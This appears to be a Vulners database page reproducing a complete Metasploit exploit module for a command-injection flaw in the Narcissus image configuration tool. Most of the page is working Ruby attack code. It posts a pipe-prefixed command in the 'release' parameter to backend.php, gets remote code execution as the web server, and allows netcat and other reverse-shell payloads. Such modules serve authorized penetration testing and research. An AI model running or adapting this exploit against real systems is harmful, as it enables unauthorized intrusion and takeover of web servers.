Lucene search
K

Narcissus Image Configuration Passthru Vulnerability

🗓️ 19 Nov 2012 21:12:57Reported by Dun, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

Narcissus Image Configuration Passthru Vulnerability allows remote code execution under the context of the web server due to improper handling of the $release parameter in the backend.php file

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Narcissus Image Configuration Passthru Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Narcissus image configuration
        function.  This is due to the backend.php file not handling the $release parameter
        properly, and then passes it on to the configure_image() function.  In this
        function, the $release parameter can be used to inject system commands for
        passthru (a PHP function that's meant to be used to run a bash script by the
        vulnerable application), which allows remote code execution under the context
        of the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dun',    #Original
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '22709' ],
          [ 'OSVDB', '87410' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x0a",
          'Compat'         =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
            },
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Narcissus', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])
      ])
  end

  def base
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    return uri
  end

  def remote_exe(command)
    res = send_request_cgi({
      'uri'      => "#{base}backend.php",
      'method'   => 'POST',
      'encode_params' => false,
      'vars_post' => {
        'machine' => '0',
        'action'  => 'configure_image',
        'release' => "|#{command}"
      }
    })

    vprint_line(res.body) if res
    return res
  end

  def check
    sig = rand_text_alpha(rand(10) + 5)  #The string to check

    vprint_status("Looking for signature '#{sig}'...")
    res = remote_exe("echo #{sig}")

    if res and res.body =~ /#{sig}/
      vprint_status("Signature '#{sig}' found.")
      return Exploit::CheckCode::Vulnerable
    else
      vprint_status("Signature not found")
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Sending malicious request...")
    remote_exe(payload.encoded)
  end


end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation